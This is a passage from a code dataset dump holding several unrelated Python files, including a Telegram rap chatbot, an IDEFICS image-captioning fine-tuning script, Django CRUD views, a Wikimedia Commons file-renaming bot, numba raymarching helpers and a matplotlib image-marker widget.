get_json_from_url(url)\n return js\n\n\ndef get_last_update_id(updates):\n update_ids = []\n for update in updates[\"result\"]:\n update_ids.append(int(update[\"update_id\"]))\n return max(update_ids)\n\n\ndef clean_word(word):\n letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n new_word = \"\"\n for c in word:\n if c in letters:\n new_word += c\n return new_word\n\n\ndef simple_rhyme(updates, word_list):\n for update in updates[\"result\"]:\n try:\n chat = update[\"message\"][\"chat\"][\"id\"]\n message = \"\"\n for word in word_list:\n word = word.upper()\n word = clean_word(word)\n rhyme_words, phonemes = db.get_items(\"rhymes\")\n if word in rhyme_words:\n print(\"thinking\")\n ph = phonemes[rhyme_words.index(word)].split(\" \")\n rhymes = {}\n for index, rhyme in enumerate(rhyme_words):\n ph2 = phonemes[index].split(\" \")\n score = 1\n minimum = min(len(ph), len(ph2))\n for i in range(1, 1 + minimum):\n if ph[-i] == ph2[-i]:\n score *= minimum - i + 1\n if score >= 2:\n rhymes[rhyme] = score\n # print(best_score, best_index)\n max_score = max(rhymes.values())\n rhymes_string = [word for word in rhymes if rhymes[word] == max_score]\n message += rhymes_string[random.randint(0,len(rhymes_string)-1)] + \" \"\n else:\n message = \"Yo what does dis mean? \"\n print(message)\n send_message(message.lower(), chat)\n\n except KeyError:\n pass\n\n\ndef handle_updates(updates, rapper = \"kanye\"):\n for update in updates[\"result\"]:\n try:\n text = update[\"message\"][\"text\"]\n # make the text all capital letters, bc in our db they are all capital\n text = text.upper()\n # we are only interested in the last word:\n text = text.split(\" \")[-1]\n # clean that word (i.e. remove non letters)\n text = clean_word(text)\n print(\"Text:\", text)\n chat = update[\"message\"][\"chat\"][\"id\"]\n words, phonemes = db.get_items(\"rhymes\")\n\n # if we have a phoneme composition of the word, use that for further work. Else, send an error message\n if text in words:\n print(\"thinking\")\n ph = phonemes[words.index(text)].split(\" \")\n # in ph are the phonemes of the input word, now we want to find a word with similar phonemes:\n best_index = 0\n best_score = 1\n rhymes = {}\n for index, word in enumerate(words):\n ph2 = phonemes[index].split(\" \")\n score = 1\n minimum = min(len(ph), len(ph2))\n for i in range(1, 1+minimum):\n if ph[-i] == ph2[-i]:\n score *= minimum - i + 1\n if score >= 2:\n rhymes[word] = score\n\n # print(best_score, best_index)\n max_score = max(rhymes.values())\n rhymes_string = [word for word in rhymes if rhymes[word] == max_score]\n # look if some word in rhymes_string matches the vocabulary of the rapper\n if rapper == \"kanye\":\n row, kanye_words = db.get_items(\"kanye\")\n kanye_words = np.random.permutation(kanye_words)\n target_word = \"\"\n for kanye_word in kanye_words:\n if kanye_word.upper() in rhymes_string:\n kanye_lyrics = open(\"KanyeWest.txt\", 'r', encoding='UTF-8').readlines()\n row_index = db.get_index(\"kanye\", kanye_word)[0]\n message = kanye_lyrics[row_index : row_index+5]\n print(message)\n send_message(\"\".join(message), chat)\n return\n out = []\n # for i in range(5):\n # out.append(rhymes_string[random.randint(0, len(rhymes_string)-1)])\n\n# send_message(\"\\n\".join(out), chat)\n elif rapper == \"eminem\":\n row, eminem_words = db.get_items(\"eminem\")\n eminem_words = np.random.permutation(eminem_words)\n target_word = \"\"\n for eminem_word in eminem_words:\n if eminem_word.upper() in rhymes_string:\n eminem_lyrics = open(\"Eminem.txt\", 'r', encoding='ISO-8859-1').readlines()\n row_index = db.get_index(\"eminem\", eminem_word)[0]\n message = eminem_lyrics[row_index: row_index + 5]\n print(message)\n send_message(\"\".join(message), chat)\n return\n\n send_message(rapper + \" does not rhyme to that word.\", chat)\n else:\n print(\"not in db\")\n message = \"Yo, what doz that mean?\"\n send_message(message, chat)\n return\n\n except KeyError:\n pass\n\n\ndef show_statistics(updates):\n for update in updates[\"result\"]:\n stats = {}\n try:\n text = update[\"message\"][\"text\"]\n chat = update[\"message\"][\"chat\"][\"id\"]\n ids, texts = db.get_items()\n for text in texts[0:10]:\n words = text.split(\" \")\n for word in words:\n if word in stats:\n stats[word] += 1\n else:\n stats[word] = 1\n message = \"\"\n for word in stats:\n message += word + \": \" + str(stats[word]) + \"\\n\"\n send_message(message, chat)\n except KeyError:\n pass\n\n\ndef get_last_chat_id_and_text(updates):\n num_updates = len(updates[\"result\"])\n last_update = num_updates - 1\n if \"text\" not in updates[\"result\"][last_update][\"message\"]:\n return (\"\", 0)\n text = updates[\"result\"][last_update][\"message\"][\"text\"]\n chat_id = updates[\"result\"][last_update][\"message\"][\"chat\"][\"id\"]\n return (text, chat_id)\n\n\ndef send_message(text, chat_id):\n text = urllib.parse.quote_plus(text)\n url = URL + \"sendMessage?text={}&chat_id={}\".format(text, chat_id)\n get_url(url)\n\n\ndef main():\n db.setup()\n last_update_id = None\n rapper = \"kanye\"\n start = True\n while True:\n updates = get_updates(last_update_id)\n\n if len(updates[\"result\"]) > 0:\n last_update_id = get_last_update_id(updates) + 1\n [text, chat_id] = get_last_chat_id_and_text(updates)\n if start:\n msg = \"Yo, my name is Rap God. Im a Chat Bot.\\nI am the best, let's give it a test!\\nYou wanna know what I can do, type !help and I can tell you!\"\n send_message(msg, chat_id)\n start = False\n elif text == \"!help\":\n msg = \"I can imitate rappers. Write somethning and I will rap to that.\\n\\n!Kanye makes me imitate Kanye West\\n!Eminem makes me imitate Eminem\\n\\nIf you just want to know a rhyme, type \\n\\n !rhyme *word* and I will give you a rhyme to every word!\\n\\nType !Goodbye to let me know you are leaving.\"\n send_message(msg, chat_id)\n elif text == \"!Goodbye\":\n msg = \"Smell ya later, alligator!\"\n send_message(msg, chat_id)\n return\n elif text == \"!Eminem\":\n rapper = \"eminem\"\n elif text == \"!Kanye\":\n rapper = \"kanye\"\n elif \"!rhyme\" in text:\n words = text.split(\" \")\n words.remove(\"!rhyme\")\n simple_rhyme(updates, words)\n else:\n handle_updates(updates, rapper)\n time.sleep(0.5)\n\n\nif __name__ == '__main__':\n main()\n # print(iesha.iesha_chat())\n # iesha.demo()","repo_name":"STrucks/Chat_Bot","sub_path":"telegram.py","file_name":"telegram.py","file_ext":"py","file_size_in_byte":9490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"365343671","text":"# adapted from https://github.com/huggingface/notebooks/blob/main/transformers_doc/en/pytorch/image_captioning.ipynb\n\n# This example demonstrates normal finetuning (w/o peft) - for the sake of keeping the memory\n# requirements small it freezes the original pre-trained text and image layers to keep the memory\n# requirements to just 40GB. If you have multiple GPUs then you can remove the unfreeze part to\n# finetune the whole model. Alternatively use the PEFT solution as shown in\n# IDEFICS_finetuning_demo.ipynb notebook which requires only 20GB to finetune the whole model.\n\nimport torch\nimport torchvision.transforms as transforms\n\nfrom datasets import load_dataset\nfrom PIL import Image\nfrom transformers import IdeficsForVisionText2Text, AutoProcessor, Trainer, TrainingArguments\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n\ncheckpoint = \"HuggingFaceM4/idefics-9b\"\n# checkpoint = \"HuggingFaceM4/tiny-random-idefics\"\n\nprocessor = AutoProcessor.from_pretrained(checkpoint)\nmodel = IdeficsForVisionText2Text.from_pretrained(checkpoint, torch_dtype=torch.bfloat16).to(device)\n\n# freeze the original text and vision models and finetune only the layers added by IDEFICS\n# you can unfreeze the whole model, but it'll require multiple gpus to finetune\nmodel.model.freeze_text_layers()\nmodel.model.freeze_vision_layers()\n\n# help util\ndef check_inference():\n url = \"https://huggingface.co/datasets/sayakpaul/sample-datasets/resolve/main/pokemon.png\"\n prompts = [\n url,\n \"Question: What's on the picture? Answer:\",\n ]\n\n inputs = processor(prompts, return_tensors=\"pt\").to(device)\n generated_ids = model.generate(**inputs, max_length=150)\n generated_text = processor.batch_decode(generated_ids, skip_special_tokens=True)[0]\n print(generated_text)\n\n# check generation before finetuning\ncheck_inference()\n# well, actually it looks like the model is already aware of pokemon - but this dataset will refine it further\n\n# finetune the model on the pokemon types dataset\nds = load_dataset(\"GabeHD/pokemon-type-captions\")\nds = ds[\"train\"].train_test_split(test_size=0.1)\ntrain_ds = ds[\"train\"]\neval_ds = ds[\"test\"]\n\ndef convert_to_rgb(image):\n # `image.convert(\"RGB\")` would only work for .jpg images, as it creates a wrong background\n # for transparent images. The call to `alpha_composite` handles this case\n if image.mode == \"RGB\":\n return image\n\n image_rgba = image.convert(\"RGBA\")\n background = Image.new(\"RGBA\", image_rgba.size, (255, 255, 255))\n alpha_composite = Image.alpha_composite(background, image_rgba)\n alpha_composite = alpha_composite.convert(\"RGB\")\n return alpha_composite\n\ndef ds_transforms(example_batch):\n image_size = processor.image_processor.image_size\n image_mean = processor.image_processor.image_mean\n image_std = processor.image_processor.image_std\n\n image_transform = transforms.Compose([\n convert_to_rgb,\n transforms.RandomResizedCrop((image_size, image_size), scale=(0.9, 1.0), interpolation=transforms.InterpolationMode.BICUBIC),\n transforms.ToTensor(),\n transforms.Normalize(mean=image_mean, std=image_std),\n ])\n\n prompts = []\n for i in range(len(example_batch)):\n prompts.append(\n [\n example_batch[\"image\"][i],\n f\"Question: What's on the picture? Answer: {example_batch['text'][i]}\\n\",\n ],\n )\n\n inputs = processor(prompts, transform=image_transform, return_tensors=\"pt\").to(device)\n\n inputs[\"labels\"] = inputs[\"input_ids\"]\n\n return inputs\n\ntrain_ds.set_transform(ds_transforms)\neval_ds.set_transform(ds_transforms)\n\nmodel_name = checkpoint.split(\"/\")[1]\n\n# this setup requires about 40GB of gpu memory\ntraining_args = TrainingArguments(\n output_dir=f\"{model_name}-pokemon\",\n learning_rate=5e-6,\n num_train_epochs=10,\n bf16=True,\n per_device_train_batch_size=32,\n per_device_eval_batch_size=32,\n gradient_accumulation_steps=2,\n dataloader_pin_memory=False,\n save_total_limit=3,\n evaluation_strategy=\"steps\",\n save_strategy=\"steps\",\n save_steps=1000, # don't save until ready...\n eval_steps=40,\n logging_steps=40,\n remove_unused_columns=False,\n push_to_hub=False,\n label_names=[\"labels\"],\n load_best_model_at_end=True,\n report_to=None,\n)\n\ntrainer = Trainer(\n model=model,\n args=training_args,\n train_dataset=train_ds,\n eval_dataset=eval_ds,\n)\n\ntrainer.train()\n\n# check generation again after finetuning\ncheck_inference()\n\n# after finetuning ideally we want generate to produce something like: a drawing of a pink and blue pokemon\n","repo_name":"huggingface/notebooks","sub_path":"examples/idefics/finetune_image_captioning.py","file_name":"finetune_image_captioning.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","stars":2864,"dataset":"github-code","pt":"53"} +{"seq_id":"16565252722","text":"'''\r\n@author: codork\r\n@date: 05-05-2020\r\n@problem: Given a string, find the first non-repeating character in it and return it's index. If it doesn't exist, return -1.\r\n'''\r\nclass Solution:\r\n def firstUniqChar(self, s: str) -> int:\r\n string = list(s)\r\n while(string):\r\n char = string.pop(0)\r\n if char in string:\r\n string = list(filter(lambda a: a != char, string))\r\n else:\r\n return s.index(char)\r\n if len(string) == 0:\r\n return -1\r\n","repo_name":"codork/competitive-coding","sub_path":"5_FirstUniqueChar.py","file_name":"5_FirstUniqueChar.py","file_ext":"py","file_size_in_byte":529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39037711719","text":"from django.shortcuts import render, redirect\nfrom apps.libro.form import LibroForm\nfrom apps.libro.models import Libro\n\ndef listLibros(request):\n libros = Libro.objects.all().order_by('-id')\n context = {'libros': libros}\n return render(request, 'libro/listlibro.html',context)\n\ndef home(request):\n return render(request, 'base/base.html')\n\ndef libroCreate(request):\n if request.method == 'POST':\n form = LibroForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('libro:listlibros')\n else:\n form = LibroForm()\n return render(request, 'libro/libro_form.html', {'form': form})\n\ndef libroUpdate(request, id_libro):\n mant = Libro.objects.get(pk=id_libro)\n\n if request.method == 'GET':\n form = LibroForm(instance=mant)\n else:\n form = LibroForm(request.POST, instance=mant)\n if form.is_valid():\n form.save()\n return redirect('libro:listlibros')\n \n return render(request, 'libro/libro_form.html', {'form': form})\n\ndef libroDelete(request, id_libro):\n mant = Libro.objects.get(pk=id_libro)\n if request.method == 'POST':\n mant.delete()\n return redirect('libro:listlibros')\n return render(request, 'libro/libroDelete.html', {'libro': mant})","repo_name":"ACAMARGO97/taller_3corte","sub_path":"apps/libro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16115452341","text":"import pandas as pd\nfrom copy import deepcopy\nfrom visrec.src.Transform import Data2Schema, Schema2Asp\nimport itertools\n\n\ndef data_to_asp(data: pd.DataFrame, ColumnTypes: dict = {}):\n return Schema2Asp(Data2Schema(data, ColumnTypes))\n\ndef GetFields(Recos):\n res = deepcopy(Recos)\n for item in res:\n Match = set()\n d = {}\n for encode in item.props['layer']:\n d.update(encode['encoding'])\n keys = d.keys()\n for key in keys:\n # if d[key].__contains__('field') and not d[key]['field'] in Match:\n # Match.append(d[key]['field'])\n if d[key].__contains__('field'):\n Match.add(d[key]['field'])\n item.fields = Match\n return res\n\n\ndef PrintVegaLite(Recos):\n index = 1\n for ans in Recos:\n print(\"index:%d\" % (index))\n print(\"Vega-Lite:\", ans.props)\n # print(\"Asp:\", ans.Ops)\n print(\"Fields:\", ans.fields)\n # print(\"TaskCount:\", ans.count)\n # print(\"Tasks:\", ans.task)\n print(\"Cost:\", ans.cost)\n print(\"----------------------------\")\n index += 1\n\n\ndef GetIters(lst):\n combs = []\n for i in range(1, len(lst)+1):\n els = [list(x) for x in itertools.combinations(lst, i)]\n combs.extend(els)\n return combs\n\n\ndef DeleteIter(column, Recos):\n columns = GetIters(sorted(column))\n NewRecos = []\n for item in Recos:\n if not sorted(list(item.fields)) in columns:\n NewRecos.append(item)\n return NewRecos\n\n\ndef GetUniqueFields(Recos):\n deRecos = []\n field = []\n taskcount = []\n # cost=[]\n for item in Recos:\n if not item.fields in field:\n field.append(item.fields)\n taskcount.append(item.count)\n # cost.append(item.cost)\n deRecos.append(item)\n # return deRecos,field,taskcount\n return deRecos\n\ndef DeLayer(props):\n if len(props[\"layer\"])<2:\n props.update(props.pop(\"layer\")[0])\n return props\n return props\n\ndef word2vec(word):\n from collections import Counter\n from math import sqrt\n # count the characters in word\n cw = Counter(word)\n # precomputes a set of the different characters\n sw = set(cw)\n # precomputes the \"length\" of the word vector\n lw = sqrt(sum(c*c for c in cw.values()))\n # return a tuple\n return cw, sw, lw\n\ndef cosdis(v1, v2):\n # which characters are common to the two words?\n common = v1[1].intersection(v2[1])\n # by definition of cosine distance we have\n return sum(v1[0][ch]*v2[0][ch] for ch in common)/v1[2]/v2[2]\n\n# def read_data_to_asp(file: str, ColumnTypes: dict = {}):\n# header = list(ColumnTypes.keys())\n# if file.endswith(\".json\"):\n# with open(file) as f:\n# data = json.load(f)\n# data = pd.DataFrame(data)\n# data = data[header]\n# df = data.where((pd.notnull(data)), None)\n# df = list(df.T.to_dict().values())\n# return Schema2Asp(Data2Schema(data, ColumnTypes)[0],Data2Schema(data, ColumnTypes)[1]), df\n# elif file.endswith(\".csv\"):\n# data = pd.read_csv(file, encoding='utf-8')\n# data = data[header]\n# df = data.where((pd.notnull(data)), None)\n# df = list(df.T.to_dict().values())\n# schema = Data2Schema(data, ColumnTypes)\n# asp = Schema2Asp(schema,ColumnTypes)\n# return asp, df\n# else:\n# raise Exception(\"invalid file type\")\n\n# def GetUniqueFields2(Recos):\n# deRecos=[]\n# field=[]\n# taskcount=[]\n# field_task=[]\n# for item in Recos:\n# temp=list(item.fields)+list(item.task)\n# if not temp in field_task:\n# field_task.append(temp)\n# field.append(item.fields)\n# taskcount.append(item.count)\n# # cost.append(item.cost)\n# deRecos.append(item)\n# return deRecos,field,taskcount\n\n# def getTempCost(fields,maxtasks,Column):\n# taskscount=0\n# if Column in fields:\n# taskscount+=maxtasks[fields.index(Column)]\n# return taskscount\n","repo_name":"ShenLeixian/TaskVis","sub_path":"backend/visrec/src/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":4070,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"18051582531","text":"#! /usr/bin/env python3\n# Script to move Fae IA imports\nimport argparse\nimport logging\n\nimport os\n\nimport pywikibot\nfrom pywikibot import textlib\n\nPREFIX = \"Hardwicke's Science-Gossip\"\nDATA = [\n (\"https://www.archive.org/download/hardwickesscienc291893\", \"Volume 29\"),\n]\nREASON = \"Move to include volume number instead of IA ID\"\nCATS = [\n \"Hardwicke's Science-Gossip\"\n]\n\n# DATA = [\n# (\"https://www.archive.org/download/hardwickesscienc{v:02}cook\".format(v=i),\n# \"Volume {v}\".format(v=i))\n# for i in range(25, 30)\n# ]\n\n\ndef main():\n\n\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('-v', '--verbose', action='store_true',\n help='show debugging information')\n parser.add_argument('-n', '--dry-run', action='store_true',\n help='')\n\n args = parser.parse_args()\n\n log_level = logging.DEBUG if args.verbose else logging.INFO\n logging.basicConfig(level=log_level)\n\n\n com_site = pywikibot.Site(\"commons\", \"commons\")\n\n\n for d in DATA:\n\n ia_id = d[0].split(\"/\")[-1]\n\n print(ia_id)\n\n pages = []\n\n for res in com_site.search(\"\\\"(IA {})\\\"\".format(ia_id)):\n\n if \"(IA {})\".format(ia_id) in res.title():\n pages.append(res)\n\n if len(pages) != 1:\n raise RuntimeError(\"Didn't find a single page, found {}\".format(len(pages)))\n\n page = pages[0]\n\n print(page.title())\n\n _, ext = os.path.splitext(page.title())\n new_title = \"File:\" + PREFIX + \" - \" + d[1] + ext\n\n text = page.text\n cats = textlib.getCategoryLinks(\n text, page.site)\n\n new_cats = []\n for cat in CATS:\n\n catpl = pywikibot.Category(page.site, cat)\n\n if catpl in cats:\n pywikibot.output('{} is already in {}.'\n .format(page.title(), catpl.title()))\n continue\n\n pywikibot.output('Adding %s' % catpl.title(as_link=True, allow_interwiki=False))\n\n new_cats.append(catpl)\n\n if len(new_cats) > 0:\n\n cats += new_cats\n\n text = textlib.replaceCategoryLinks(\n text, cats, site=page.site)\n\n if not args.dry_run:\n page.put(text, summary=\"Add categories: \" + \", \".join(\n [c.title(as_link=True, allow_interwiki=False) for c in new_cats]))\n\n if not args.dry_run:\n page.move(new_title,\n reason=REASON)\n\n print(cats)\n\nif __name__ == \"__main__\":\n main()","repo_name":"inductiveload/wstools","sub_path":"wstools/commons_ia_mover.py","file_name":"commons_ia_mover.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18324523423","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @File : test__suite.py\n# @Author: Lizi\n# @Date : 2020/11/2\n\n\nimport unittest\nfrom unittest_testcase import Math_testcase as testcase\nfrom BeautifulReport import BeautifulReport\n# from .unittest_testcase import Math_testcase as testcase\n\nif __name__ == '__main__':\n suite = unittest.TestSuite()\n # tests = [testcase('setUp'), testcase('tearDown'), testcase('test_add_init'),testcase('test_sub_int'),\n # testcase('test_sub_float'),testcase('test_sub_float2'), testcase('test_multi_list'),\n # testcase('test_multi_str'), testcase('test_div_int'),testcase('test_div_float'),\n # testcase('test_div_float2'),testcase('test_div_exception')]\n tests = unittest.TestLoader().loadTestsFromTestCase(testCaseClass='testcase')\n suite.addTests(tests)\n with open('test_report', 'w') as file:\n runner = unittest.TextTestRunner(stream=file, descriptions=True, verbosity=2)\n runner.run(suite)\n\n","repo_name":"rage-vampire/Python","sub_path":"lizi_project/test_unittest/test_suite.py","file_name":"test_suite.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"19151676863","text":"import numpy as np\nfrom numba import njit, prange\nimport math\n\n# Длина вектора\n@njit(fastmath=True, cache=True)\ndef magnitude(a):\n ans = 0\n for i in prange(len(a)):\n ans += a[i] * a[i]\n return ans ** 0.5\n\n\n@njit(fastmath=True, cache=True)\ndef distance_sphere(p, sphere_pos, d):\n return magnitude(sphere_pos - p) - d\n\n\n@njit(fastmath=True, cache=True)\ndef distance_sphere_tardis(p, d):\n return (\n magnitude(\n np.array([(p[0] + 2) % 4 - 2, (p[1] + 2) % 4 - 2, (p[2] + 2) % 4 - 2])\n )\n - d\n )\n\n\n@njit(fastmath=True, cache=True)\ndef distance_torus(p, t):\n q = np.array([magnitude(np.array([p[0], p[2]])) - t[0], p[1]])\n return magnitude(q) - t[1]\n\n\n@njit(fastmath=True, cache=True)\ndef multiply_3x1_3x3(a0, b0, b1, b2):\n return np.array(\n [\n a0[0] * b0[0] + a0[1] * b1[0] + a0[2] * b2[0],\n a0[0] * b0[1] + a0[1] * b1[1] + a0[2] * b2[1],\n a0[0] * b0[2] + a0[1] * b1[2] + a0[2] * b2[2],\n ]\n )\n\n@njit(fastmath=True, cache=True)\ndef degrotate(v, x, y):\n sin_x, cos_x = math.sin(math.radians(x)), math.cos(math.radians(x))\n sin_y, cos_y = math.sin(math.radians(y)), math.cos(math.radians(y))\n return rotate(v, sin_x, cos_x, sin_y, cos_y)\n\n\n# Вращает вектор с помощью матрицы вращения\n# Принимает как вращение синусы и косинусы углов\n@njit(fastmath=True, cache=True)\ndef rotate(v, sin_y, cos_y, sin_x, cos_x):\n a = multiply_3x1_3x3(\n v,\n np.array([1.0, 0.0, 0.0]),\n np.array([0.0, cos_x, -sin_x]),\n np.array([0.0, sin_x, cos_x]),\n )\n b = multiply_3x1_3x3(\n a,\n np.array([cos_y, 0.0, sin_y]),\n np.array([0.0, 1.0, 0.0]),\n np.array([-sin_y, 0.0, cos_y]),\n )\n return b\n\n\n@njit(fastmath=True, cache=True)\ndef normalize(a):\n return a / magnitude(a)\n\n\n@njit(fastmath=True, cache=True)\ndef calc_normal(pos, distance_map, enemies):\n EPS = np.array([0.01, 0.0])\n XYY = np.array([EPS[0], EPS[1], EPS[1]])\n YXY = np.array([EPS[1], EPS[0], EPS[1]])\n YYX = np.array([EPS[1], EPS[1], EPS[0]])\n nor = np.array(\n [\n distance_map(pos + XYY, enemies) - distance_map(pos - XYY, enemies),\n distance_map(pos + YXY, enemies) - distance_map(pos - YXY, enemies),\n distance_map(pos + YYX, enemies) - distance_map(pos - YYX, enemies),\n ]\n )\n return normalize(nor)\n\n@njit(fastmath=True, cache=True)\ndef distance_octahedron(p, op, s):\n p = p-op\n p = np.abs(p)\n return (p[0]+p[1]+p[2]-s)*0.57735027\n","repo_name":"cupcak0/rhythm_shooter","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21232975693","text":"import matplotlib as mpl\nmpl.use('Qt5Agg')\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\n# from skimage import exposure\nfrom skimage.external import tifffile as tiff\n\nclass mpl3DFigure:\n\n\tdef __init__(self,view):\n\t\t# Set up empty plot variables.\n\t\tself.volume = None\n\t\t# self.adjusted = None\n\t\tself.dims = None\n\t\tself.x = []\n\t\tself.y = []\n\t\tself.i = 0\n\t\tself.max_markers = 0\n\t\tself.marker_scat = ()\n\t\t# Create a figure to plot on.\n\t\tself.fig = plt.figure()\n\t\t# Set face color.\n\t\tself.fig.patch.set_facecolor('#FFFFFF')\n\t\t# Create an axis in the figure.\n\t\tself.ax = self.fig.add_subplot(111, axisbg='#FFFFFF')\n\t\t# Set tight fitting.\n\t\tself.fig.tight_layout()\n\t\t# Set the tick colors.\n\t\tself.ax.tick_params(colors='#000000')\n\n\t\tif view == 'Coronal':\n\t\t\tself.ax.set_title('0 Degree View')\n\t\t\tself.ax.set_xlabel('X-axis (LR)')\n\t\t\tself.ax.set_ylabel('Z-axis (HF)')\n\t\telif view == 'Sagittal':\n\t\t\tself.ax.set_title('90 Degree View')\n\t\t\tself.ax.set_xlabel('Y-axis (PA)')\n\t\t\tself.ax.set_ylabel('Z-axis (HF)')\n\t\telse:\n\t\t\t# Deal with something that shouldn't occur.\n\t\t\tself.ax.set_title('Unknown')\n\t\t\tself.ax.set_xlabel('Unknown')\n\t\t\tself.ax.set_ylabel('Unknown')\n\n\t\t# Set Label Colors.\n\t\tself.ax.title.set_color('#000000')\n\t\tself.ax.xaxis.label.set_color('#000000')\n\t\tself.ax.yaxis.label.set_color('#000000')\n\t\t# Create a canvas widget for Qt to use.\n\t\tself.canvas = FigureCanvas(self.fig)\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()\n\n\tdef loadImage(self,fn,pix,orientation='HFS',img=1,format='npy'):\n\t\t# Try to read in numpy array.\n\t\tif format == 'npy':\n\t\t\tself.data = np.load(fn)\n\t\telse:\n\t\t\t# For everything else assume it's an image readable by tifffile.\n\t\t\tself.data = tiff.imread(fn)\n\n\t\t# Patient imaging orientation. Calculate the extent (left, right, bottom, top).\n\t\tif orientation == 'HFS':\n\t\t\tif img == 1:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[0],np.shape(self.data)[0]*pix[2],0])\n\t\t\tif img == 2:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[1],np.shape(self.data)[0]*pix[2],0])\n\t\telif orientation == 'FHS':\n\t\t\tif img == 1:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[0],np.shape(self.data)[0]*pix[2],0])\n\t\t\tif img == 2:\n\t\t\t\tself.dims = np.array([0,np.shape(self.data)[1]*pix[1],np.shape(self.data)[0]*pix[2],0])\n\t\t# Display the image.\n\t\tself.image = self.ax.imshow(self.data, cmap='bone', extent=self.dims)\n\t\tself.ax.set_autoscale_on(False)\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()\n\t\t# Start Callback ID\n\t\tself.cid = self.canvas.mpl_connect('button_press_event', self.onClick)\n\t\n\tdef onClick(self,event):\n\t\t# If mouse button 1 is clicked (left click).\n\t\tif event.button == 1:\n\t\t\t# Create scatter point and numbered text for each marker up to max markers.\n\t\t\tif self.i < self.max_markers:\n\t\t\t\tself.x.append(event.xdata)\n\t\t\t\tself.y.append(event.ydata)\n\t\t\t\tself.i = self.i+1\n\t\t\t\t# Create tuple list of scatter and text plots.\n\t\t\t\ta = self.ax.scatter(event.xdata,event.ydata,c='r',marker='+',s=50)\n\t\t\t\tb = self.ax.text(event.xdata+1,event.ydata-3,self.i,color='r')\n\t\t\t\ttmp = a,b\n\t\t\t\tself.marker_scat = self.marker_scat + tmp\n\t\t\t\t# Refresh canvas.\n\t\t\t\tself.canvas.draw()\n\t\t\telse:\n\t\t\t\tpass\n\n\tdef resetMarkers(self,args=None):\n\t\t# Reset all parameters back to their initial states.\n\t\tif args == 'all':\n\t\t\tself.x = []\n\t\t\tself.y = []\n\t\t\tself.i = 0\n\t\t# Remove each scatter point from the canvas.\n\t\tfor i in range(len(self.marker_scat)):\n\t\t\tself.marker_scat[i].remove()\n\t\t# Reset the tuple list.\n\t\tself.marker_scat = ()\n\t\t# Redraw the canvas. \n\t\tself.canvas.draw()\n\n\tdef updateImage(self,data):\n\t\t# Set image data.\n\t\tself.image.set_data(data)\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()\n\n\tdef markerUpdate(self):\n\t\t# Reset the markers.\n\t\tself.resetMarkers()\n\t\t# Re-plot markers with pts. \n\t\tfor i in range(self.max_markers):\n\t\t\t# Create tuple list of scatter and text plots.\n\t\t\ta = self.ax.scatter(self.x[i],self.y[i],c='b',marker='+',s=50)\n\t\t\tb = self.ax.text(self.x[i]+1,self.y[i]-3,i+1,color='b')\n\t\t\ttmp = a,b\n\t\t\tself.marker_scat = self.marker_scat + tmp\n\t\t# Refresh the canvas.\n\t\tself.canvas.draw()","repo_name":"stylekilla/synctools","sub_path":"widgets/mpl3DFigure.py","file_name":"mpl3DFigure.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71727572327","text":"#!/usr/bin/python3\n\n# 1) Set the users variable to be an empty list\nusers = []\n# 2) Add 'kevin', 'bob', and 'alice' to the users list in that order without reassigning the variable.\nusers.append('kevin')\nusers.append('bob')\nusers.append('alice')\nprint(users)\n# 3) Remove 'bob' from the `users` list without reassigning the variable.\ndel users[1]\nprint(users)\n\n# 4) Reverse the users list and assign the result to `rev_users`\nrev_users = list(reversed(users))\nprint(rev_users)\n\n# 5) Add the user 'melody' to users where 'bob' used to be.\n\nusers.insert(1, 'melody')\n\n# 6) Add the users 'andy', 'wanda', and 'jim' to the users list using a single command\n\nusers += ['andy', 'wanda', 'jim']\n\n# 7) Slice the users lists to return the 3rd and 4th items and assign the result to `center_users`\n\ncenter_users = users[2:4]","repo_name":"stariel/PythonPractice","sub_path":"list/using-lists.py","file_name":"using-lists.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42414022135","text":"# Math is done as if these are 3D objects operating on a 2D plane, as gravity does not work in 2 dimensions\n\nfrom math import pi, sqrt\nimport pygame\nfrom random import uniform\n\nimport config\n\n\nclass Object:\n\n max_mass = 100\n max_density = 100\n\n def __init__(self, position=None):\n\n if position is None:\n self.position = (int(uniform(config.window_size[0] / 4, 3 * config.window_size[0] / 4)),\n int(uniform(config.window_size[0] / 4, 3 * config.window_size[1] / 4)))\n else:\n self.position = position\n\n # self.mass = uniform(10, Object.max_mass)\n # self.density = 